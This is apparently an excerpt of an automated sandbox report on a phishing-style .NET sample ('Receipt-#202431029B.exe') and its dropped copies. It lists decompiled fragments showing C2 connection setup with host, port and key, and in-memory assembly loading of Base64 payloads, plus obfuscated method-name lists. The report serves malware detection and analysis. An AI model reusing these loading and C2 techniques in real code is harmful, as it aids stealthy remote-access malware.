            Source: Binary string: RVYv.pdb source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Drawing.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdb21-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32ine\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr

            Data Obfuscation

            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.cs .Net Code: G5O6O67onD System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Messages.cs .Net Code: Memory
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.cs .Net Code: G5O6O67onD System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.cs .Net Code: G5O6O67onD System.Reflection.Assembly.Load(byte[])
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Messages.cs .Net Code: Memory
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Messages.cs .Net Code: Memory
            Source: Receipt-#202431029B.exe Static PE information: 0xF56D7741 [Fri Jun 25 07:31:13 2100 UTC]
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Code function: 0_2_072EA7F8 pushad ; iretd 0_2_072EA7F9
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C4C push edx; iretd 9_2_08CF6C52
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C44 push edx; iretd 9_2_08CF6C4A
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C58 push edx; iretd 9_2_08CF6C5A
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C54 push edx; iretd 9_2_08CF6C56
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C64 push edx; iretd 9_2_08CF6C66
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C3C push edx; iretd 9_2_08CF6C42
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C38 push edx; iretd 9_2_08CF6C3A
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe Code function: 9_2_08CF6C34 push edx; iretd 9_2_08CF6C36
            Source: Receipt-#202431029B.exe Static PE information: section name: .text entropy: 7.383968480412204
            Source: XetHVID.exe.0.dr Static PE information: section name: .text entropy: 7.383968480412204
            Source: Notepab.exe.8.dr Static PE information: section name: .text entropy: 7.383968480412204
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, POBDkssu7i4qhxHOE3.cs High entropy of concatenated method names: 'XDahXpsExv', 'u05hDW5iCF', 'hbyhOLWHNH', 'YwuhYfHc9n', 'CjwhTHikGU', 'rqZhu1WTQn', 't4xhCMgvwT', 'bHXhPoYyKA', 'KjvhJ6CR7R', 'X69h9F7KrC'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, gk1r6u3PJ4YZfk0Jh1.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BhkFj9T3fs', 'FUPF0yg4dd', 'RWHFzmY0uJ', 'w69aU7ldg2', 'jVsaRq2i4b', 'IhLaFpJC4q', 'Xk7aaRqnyw', 'MBKuRucgPdIcO7G9jyD'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, Y73yD1R6ULdWq3LfCi4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfL1bjSAtr', 'el91dEIw1a', 'Yqi1k8m7A7', 'WX411Y0X0d', 'ixg1En4WTY', 'fjt1QAtJQx', 'hCO1qT3RbS'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, hRfP2401u4Wy3ZaC0d.cs High entropy of concatenated method names: 'RLSd3lt7N6', 'llidgXDfLn', 'KyJdH1Al4U', 'AVsdhELCG5', 'pbwdbAHBFc', 'fhWdrGxkHt', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, u1stuMz0ofr8O7nZFy.cs High entropy of concatenated method names: 'EhiduHFFr6', 'j1xdPsNbed', 'dpudJLt4pI', 'MMBdN2K93R', 'LAedAivOHN', 'xM9d7SbEPe', 'pOqdWvSOYN', 'RQrdqdtSbw', 'qwYdX0C8QW', 'PfLdDxDYRp'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, KF1RPYFCnoxs4StQAi.cs High entropy of concatenated method names: 'lEYOcid1F', 'TBCY1mS31', 'C5KuGpd5C', 'zOMCYcC2F', 'wpKJSuQhA', 'joP91JcHK', 'kwtoex3ORwEraLdhMO', 'IHnBMVIKhm8SRRLy4B', 'IBSU4esEm9XQgDRGPJ', 'rI4M6t0Yn'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, MKwas8PYpZOx8H3OeB.cs High entropy of concatenated method names: 'Q32VxGHS5u', 'PCbVlmPKlU', 'SNFVIoYT0T', 'VT7VKwDxYw', 'QdcVtIO91l', 'R6wVGWUvTD', 'BafVnOSnpO', 'yLxVmuEomy', 'nm4VjsYejS', 'ydTV0UQMhZ'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, KIep4jGrIXCGAL9Joj.cs High entropy of concatenated method names: 'fx1imvo5iE', 'KVGi0fI0if', 'BCuMUUwHXR', 'R8SMROI6ku', 'oPeiwr6ijl', 'IVPi8DoMOd', 'zyvioXMrQi', 'OEyix17q1e', 'eXXilYj8UZ', 'KMNiI78P62'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, yexdJS6ON7njLgLP4l.cs High entropy of concatenated method names: 'wtSRhKwas8', 'ApZRrOx8H3', 'F2TR58Vc5D', 'YGvRptwggr', 'FcSRe03wYA', 'xorRZ9VyLr', 'hIr8NFaJI7rG5wPwOc', 'KLFDJgZuN1lFH0FC5X', 'tHoRR8CoBK', 'NWgRa43vTb'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, u9bLHSjivviXKdE2oQ.cs High entropy of concatenated method names: 'zd8bNVNgF1', 'ohRbAVcwHU', 'fY7b4NO1vj', 'calb7jQ8BJ', 'ftDbWMe2Gf', 'kOvbfkF5Hp', 'gLTbyZINvT', 'A2GbSN6ZaF', 'SWkbsWDG2g', 'f9hbLdvtrs'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, tBrTLvnq24p7uCKflG.cs High entropy of concatenated method names: 'iNObeugGtn', 'M4rbiLLUEg', 'nGkbbNILpE', 'D31bk94b4n', 'SAVbEm42S1', 'rnIbqmhDfW', 'Dispose', 'x9fMBj1XaV', 'jZCMVDCwhf', 'jChM39nKpd'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, aNCEL9J2T8Vc5DjGvt.cs High entropy of concatenated method names: 'Q0g3YW9WLj', 'AZu3ujt55q', 'n7I3PgJCh7', 'xal3JCHru7', 'peG3ek9crm', 'qIE3ZaE8Yy', 'j5H3ibdKs3', 'Wqd3Mu7L4J', 'Bgl3bPlMRL', 'oAF3dYG6RW'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, kfPFjHKPrN41PeqK4o.cs High entropy of concatenated method names: 'bUki52OlHX', 'xqKip0NcDA', 'ToString', 'PuDiBqcpJt', 'g3ciVUrudm', 'DQri3wx9Fy', 'hi4igVvP1E', 'R7niHHiHA0', 'cFaihOigeF', 'MrYirSG4yQ'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.cs High entropy of concatenated method names: 'zokavevnBU', 'SokaBS78nT', 'EhhaVD46A1', 'zjSa3LK9eG', 'Hi6agX9ffP', 'MOjaHtQPa3', 'pGLahyNZPZ', 'OZxarOHyOJ', 'XiTa2NZ6f9', 'KUoa5oBGx6'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, w7im7ERRxp7kLH42pxP.cs High entropy of concatenated method names: 'g8fd0AKBfj', 'FA7dzes3wo', 'SOvkUL5HOr', 'KGOkRxOGIy', 'ryGkFZXJ5U', 'wkEka2w6Uq', 'udjk6FaBA8', 'mo4kvZGWhX', 'rAgkBJGpqs', 'vcCkVsRuuJ'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, OYAXorN9VyLrWvsBRw.cs High entropy of concatenated method names: 'yD0HvrqXtZ', 'g93HVufBUy', 'G5rHgxBM4Z', 'SwWHhKXwmC', 'iXWHrSKcdP', 'O9NgtWbHJa', 'lf5gGbQK2t', 'Rf7gn0RfxZ', 'P6ygmBi2h1', 'qEhgj7eRZk'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, WBcJyFoFcy9A0CXYMF.cs High entropy of concatenated method names: 'ln5cPgLYUc', 'zb3cJiaced', 'N7acNGK00A', 'dEAcANd4It', 'Yhsc7MFO3b', 'fSkcWWcJII', 'K9DcyUZxY7', 'hnVcSuTKul', 'TmfcLSfpqe', 'vBQcw1swEB'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, JC2QDIRFrOWcdCwqFkG.cs High entropy of concatenated method names: 'ToString', 'JTLkPSxkEm', 'pBlkJ3IsrF', 'KIjk9Ox4T4', 'gVHkNF130W', 'GwZkAetKjy', 'WGfk4AKv6J', 'Xf5k78VusY', 'iTmmZ5Tzd7PmFFLqBbN', 'EmKa7sH57XJBJJ0fZhd'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, Oggr1D9mrEqm09cS03.cs High entropy of concatenated method names: 'hSPgTtCpfU', 'UTEgCxLgpY', 'zPB348QiBA', 'AQ137sVCqF', 'xmD3W60qkS', 'hHf3fkRmRt', 'qZd3y6hZ1x', 'oKZ3SCDokm', 'zia3snO3PS', 'HKU3LMAVmh'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, MiqhSGVvq03kxUsc87.cs High entropy of concatenated method names: 'Dispose', 'Hp7RjuCKfl', 'ySxFAkgY23', 'lFX3jABUuf', 'U9YR0my4s5', 'lONRzS2em2', 'ProcessDialogKey', 'aVEFU9bLHS', 'qvvFRiXKdE', 'loQFF3RfP2'
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BK6KfXxNl4cYo1AxVW.cs High entropy of concatenated method names: 'QN0eLpDIJv', 'YEGe80E26n', 'yPJexg4gJp', 'qLqel9xOWx', 'hv3eAM37ZP', 'YUoe4cHJiW', 'cKie7hj5Fh', 'oeWeWuserN', 'Ixbef0D2Jk', 'UiNeyfkGVV'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, POBDkssu7i4qhxHOE3.cs High entropy of concatenated method names: 'XDahXpsExv', 'u05hDW5iCF', 'hbyhOLWHNH', 'YwuhYfHc9n', 'CjwhTHikGU', 'rqZhu1WTQn', 't4xhCMgvwT', 'bHXhPoYyKA', 'KjvhJ6CR7R', 'X69h9F7KrC'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, gk1r6u3PJ4YZfk0Jh1.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BhkFj9T3fs', 'FUPF0yg4dd', 'RWHFzmY0uJ', 'w69aU7ldg2', 'jVsaRq2i4b', 'IhLaFpJC4q', 'Xk7aaRqnyw', 'MBKuRucgPdIcO7G9jyD'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, Y73yD1R6ULdWq3LfCi4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfL1bjSAtr', 'el91dEIw1a', 'Yqi1k8m7A7', 'WX411Y0X0d', 'ixg1En4WTY', 'fjt1QAtJQx', 'hCO1qT3RbS'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, hRfP2401u4Wy3ZaC0d.cs High entropy of concatenated method names: 'RLSd3lt7N6', 'llidgXDfLn', 'KyJdH1Al4U', 'AVsdhELCG5', 'pbwdbAHBFc', 'fhWdrGxkHt', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, u1stuMz0ofr8O7nZFy.cs High entropy of concatenated method names: 'EhiduHFFr6', 'j1xdPsNbed', 'dpudJLt4pI', 'MMBdN2K93R', 'LAedAivOHN', 'xM9d7SbEPe', 'pOqdWvSOYN', 'RQrdqdtSbw', 'qwYdX0C8QW', 'PfLdDxDYRp'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, KF1RPYFCnoxs4StQAi.cs High entropy of concatenated method names: 'lEYOcid1F', 'TBCY1mS31', 'C5KuGpd5C', 'zOMCYcC2F', 'wpKJSuQhA', 'joP91JcHK', 'kwtoex3ORwEraLdhMO', 'IHnBMVIKhm8SRRLy4B', 'IBSU4esEm9XQgDRGPJ', 'rI4M6t0Yn'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, MKwas8PYpZOx8H3OeB.cs High entropy of concatenated method names: 'Q32VxGHS5u', 'PCbVlmPKlU', 'SNFVIoYT0T', 'VT7VKwDxYw', 'QdcVtIO91l', 'R6wVGWUvTD', 'BafVnOSnpO', 'yLxVmuEomy', 'nm4VjsYejS', 'ydTV0UQMhZ'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, KIep4jGrIXCGAL9Joj.cs High entropy of concatenated method names: 'fx1imvo5iE', 'KVGi0fI0if', 'BCuMUUwHXR', 'R8SMROI6ku', 'oPeiwr6ijl', 'IVPi8DoMOd', 'zyvioXMrQi', 'OEyix17q1e', 'eXXilYj8UZ', 'KMNiI78P62'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, yexdJS6ON7njLgLP4l.cs High entropy of concatenated method names: 'wtSRhKwas8', 'ApZRrOx8H3', 'F2TR58Vc5D', 'YGvRptwggr', 'FcSRe03wYA', 'xorRZ9VyLr', 'hIr8NFaJI7rG5wPwOc', 'KLFDJgZuN1lFH0FC5X', 'tHoRR8CoBK', 'NWgRa43vTb'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, u9bLHSjivviXKdE2oQ.cs High entropy of concatenated method names: 'zd8bNVNgF1', 'ohRbAVcwHU', 'fY7b4NO1vj', 'calb7jQ8BJ', 'ftDbWMe2Gf', 'kOvbfkF5Hp', 'gLTbyZINvT', 'A2GbSN6ZaF', 'SWkbsWDG2g', 'f9hbLdvtrs'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, tBrTLvnq24p7uCKflG.cs High entropy of concatenated method names: 'iNObeugGtn', 'M4rbiLLUEg', 'nGkbbNILpE', 'D31bk94b4n', 'SAVbEm42S1', 'rnIbqmhDfW', 'Dispose', 'x9fMBj1XaV', 'jZCMVDCwhf', 'jChM39nKpd'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, aNCEL9J2T8Vc5DjGvt.cs High entropy of concatenated method names: 'Q0g3YW9WLj', 'AZu3ujt55q', 'n7I3PgJCh7', 'xal3JCHru7', 'peG3ek9crm', 'qIE3ZaE8Yy', 'j5H3ibdKs3', 'Wqd3Mu7L4J', 'Bgl3bPlMRL', 'oAF3dYG6RW'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, kfPFjHKPrN41PeqK4o.cs High entropy of concatenated method names: 'bUki52OlHX', 'xqKip0NcDA', 'ToString', 'PuDiBqcpJt', 'g3ciVUrudm', 'DQri3wx9Fy', 'hi4igVvP1E', 'R7niHHiHA0', 'cFaihOigeF', 'MrYirSG4yQ'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.cs High entropy of concatenated method names: 'zokavevnBU', 'SokaBS78nT', 'EhhaVD46A1', 'zjSa3LK9eG', 'Hi6agX9ffP', 'MOjaHtQPa3', 'pGLahyNZPZ', 'OZxarOHyOJ', 'XiTa2NZ6f9', 'KUoa5oBGx6'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, w7im7ERRxp7kLH42pxP.cs High entropy of concatenated method names: 'g8fd0AKBfj', 'FA7dzes3wo', 'SOvkUL5HOr', 'KGOkRxOGIy', 'ryGkFZXJ5U', 'wkEka2w6Uq', 'udjk6FaBA8', 'mo4kvZGWhX', 'rAgkBJGpqs', 'vcCkVsRuuJ'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, OYAXorN9VyLrWvsBRw.cs High entropy of concatenated method names: 'yD0HvrqXtZ', 'g93HVufBUy', 'G5rHgxBM4Z', 'SwWHhKXwmC', 'iXWHrSKcdP', 'O9NgtWbHJa', 'lf5gGbQK2t', 'Rf7gn0RfxZ', 'P6ygmBi2h1', 'qEhgj7eRZk'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, WBcJyFoFcy9A0CXYMF.cs High entropy of concatenated method names: 'ln5cPgLYUc', 'zb3cJiaced', 'N7acNGK00A', 'dEAcANd4It', 'Yhsc7MFO3b', 'fSkcWWcJII', 'K9DcyUZxY7', 'hnVcSuTKul', 'TmfcLSfpqe', 'vBQcw1swEB'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, JC2QDIRFrOWcdCwqFkG.cs High entropy of concatenated method names: 'ToString', 'JTLkPSxkEm', 'pBlkJ3IsrF', 'KIjk9Ox4T4', 'gVHkNF130W', 'GwZkAetKjy', 'WGfk4AKv6J', 'Xf5k78VusY', 'iTmmZ5Tzd7PmFFLqBbN', 'EmKa7sH57XJBJJ0fZhd'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, Oggr1D9mrEqm09cS03.cs High entropy of concatenated method names: 'hSPgTtCpfU', 'UTEgCxLgpY', 'zPB348QiBA', 'AQ137sVCqF', 'xmD3W60qkS', 'hHf3fkRmRt', 'qZd3y6hZ1x', 'oKZ3SCDokm', 'zia3snO3PS', 'HKU3LMAVmh'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, MiqhSGVvq03kxUsc87.cs High entropy of concatenated method names: 'Dispose', 'Hp7RjuCKfl', 'ySxFAkgY23', 'lFX3jABUuf', 'U9YR0my4s5', 'lONRzS2em2', 'ProcessDialogKey', 'aVEFU9bLHS', 'qvvFRiXKdE', 'loQFF3RfP2'
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BK6KfXxNl4cYo1AxVW.cs High entropy of concatenated method names: 'QN0eLpDIJv', 'YEGe80E26n', 'yPJexg4gJp', 'qLqel9xOWx', 'hv3eAM37ZP', 'YUoe4cHJiW', 'cKie7hj5Fh', 'oeWeWuserN', 'Ixbef0D2Jk', 'UiNeyfkGVV'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, POBDkssu7i4qhxHOE3.cs High entropy of concatenated method names: 'XDahXpsExv', 'u05hDW5iCF', 'hbyhOLWHNH', 'YwuhYfHc9n', 'CjwhTHikGU', 'rqZhu1WTQn', 't4xhCMgvwT', 'bHXhPoYyKA', 'KjvhJ6CR7R', 'X69h9F7KrC'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, gk1r6u3PJ4YZfk0Jh1.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BhkFj9T3fs', 'FUPF0yg4dd', 'RWHFzmY0uJ', 'w69aU7ldg2', 'jVsaRq2i4b', 'IhLaFpJC4q', 'Xk7aaRqnyw', 'MBKuRucgPdIcO7G9jyD'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, Y73yD1R6ULdWq3LfCi4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KfL1bjSAtr', 'el91dEIw1a', 'Yqi1k8m7A7', 'WX411Y0X0d', 'ixg1En4WTY', 'fjt1QAtJQx', 'hCO1qT3RbS'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, hRfP2401u4Wy3ZaC0d.cs High entropy of concatenated method names: 'RLSd3lt7N6', 'llidgXDfLn', 'KyJdH1Al4U', 'AVsdhELCG5', 'pbwdbAHBFc', 'fhWdrGxkHt', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, u1stuMz0ofr8O7nZFy.cs High entropy of concatenated method names: 'EhiduHFFr6', 'j1xdPsNbed', 'dpudJLt4pI', 'MMBdN2K93R', 'LAedAivOHN', 'xM9d7SbEPe', 'pOqdWvSOYN', 'RQrdqdtSbw', 'qwYdX0C8QW', 'PfLdDxDYRp'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, KF1RPYFCnoxs4StQAi.cs High entropy of concatenated method names: 'lEYOcid1F', 'TBCY1mS31', 'C5KuGpd5C', 'zOMCYcC2F', 'wpKJSuQhA', 'joP91JcHK', 'kwtoex3ORwEraLdhMO', 'IHnBMVIKhm8SRRLy4B', 'IBSU4esEm9XQgDRGPJ', 'rI4M6t0Yn'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, MKwas8PYpZOx8H3OeB.cs High entropy of concatenated method names: 'Q32VxGHS5u', 'PCbVlmPKlU', 'SNFVIoYT0T', 'VT7VKwDxYw', 'QdcVtIO91l', 'R6wVGWUvTD', 'BafVnOSnpO', 'yLxVmuEomy', 'nm4VjsYejS', 'ydTV0UQMhZ'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, KIep4jGrIXCGAL9Joj.cs High entropy of concatenated method names: 'fx1imvo5iE', 'KVGi0fI0if', 'BCuMUUwHXR', 'R8SMROI6ku', 'oPeiwr6ijl', 'IVPi8DoMOd', 'zyvioXMrQi', 'OEyix17q1e', 'eXXilYj8UZ', 'KMNiI78P62'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, yexdJS6ON7njLgLP4l.cs High entropy of concatenated method names: 'wtSRhKwas8', 'ApZRrOx8H3', 'F2TR58Vc5D', 'YGvRptwggr', 'FcSRe03wYA', 'xorRZ9VyLr', 'hIr8NFaJI7rG5wPwOc', 'KLFDJgZuN1lFH0FC5X', 'tHoRR8CoBK', 'NWgRa43vTb'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, u9bLHSjivviXKdE2oQ.cs High entropy of concatenated method names: 'zd8bNVNgF1', 'ohRbAVcwHU', 'fY7b4NO1vj', 'calb7jQ8BJ', 'ftDbWMe2Gf', 'kOvbfkF5Hp', 'gLTbyZINvT', 'A2GbSN6ZaF', 'SWkbsWDG2g', 'f9hbLdvtrs'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, tBrTLvnq24p7uCKflG.cs High entropy of concatenated method names: 'iNObeugGtn', 'M4rbiLLUEg', 'nGkbbNILpE', 'D31bk94b4n', 'SAVbEm42S1', 'rnIbqmhDfW', 'Dispose', 'x9fMBj1XaV', 'jZCMVDCwhf', 'jChM39nKpd'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, aNCEL9J2T8Vc5DjGvt.cs High entropy of concatenated method names: 'Q0g3YW9WLj', 'AZu3ujt55q', 'n7I3PgJCh7', 'xal3JCHru7', 'peG3ek9crm', 'qIE3ZaE8Yy', 'j5H3ibdKs3', 'Wqd3Mu7L4J', 'Bgl3bPlMRL', 'oAF3dYG6RW'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, kfPFjHKPrN41PeqK4o.cs High entropy of concatenated method names: 'bUki52OlHX', 'xqKip0NcDA', 'ToString', 'PuDiBqcpJt', 'g3ciVUrudm', 'DQri3wx9Fy', 'hi4igVvP1E', 'R7niHHiHA0', 'cFaihOigeF', 'MrYirSG4yQ'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.cs High entropy of concatenated method names: 'zokavevnBU', 'SokaBS78nT', 'EhhaVD46A1', 'zjSa3LK9eG', 'Hi6agX9ffP', 'MOjaHtQPa3', 'pGLahyNZPZ', 'OZxarOHyOJ', 'XiTa2NZ6f9', 'KUoa5oBGx6'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, w7im7ERRxp7kLH42pxP.cs High entropy of concatenated method names: 'g8fd0AKBfj', 'FA7dzes3wo', 'SOvkUL5HOr', 'KGOkRxOGIy', 'ryGkFZXJ5U', 'wkEka2w6Uq', 'udjk6FaBA8', 'mo4kvZGWhX', 'rAgkBJGpqs', 'vcCkVsRuuJ'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, OYAXorN9VyLrWvsBRw.cs High entropy of concatenated method names: 'yD0HvrqXtZ', 'g93HVufBUy', 'G5rHgxBM4Z', 'SwWHhKXwmC', 'iXWHrSKcdP', 'O9NgtWbHJa', 'lf5gGbQK2t', 'Rf7gn0RfxZ', 'P6ygmBi2h1', 'qEhgj7eRZk'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, WBcJyFoFcy9A0CXYMF.cs High entropy of concatenated method names: 'ln5cPgLYUc', 'zb3cJiaced', 'N7acNGK00A', 'dEAcANd4It', 'Yhsc7MFO3b', 'fSkcWWcJII', 'K9DcyUZxY7', 'hnVcSuTKul', 'TmfcLSfpqe', 'vBQcw1swEB'
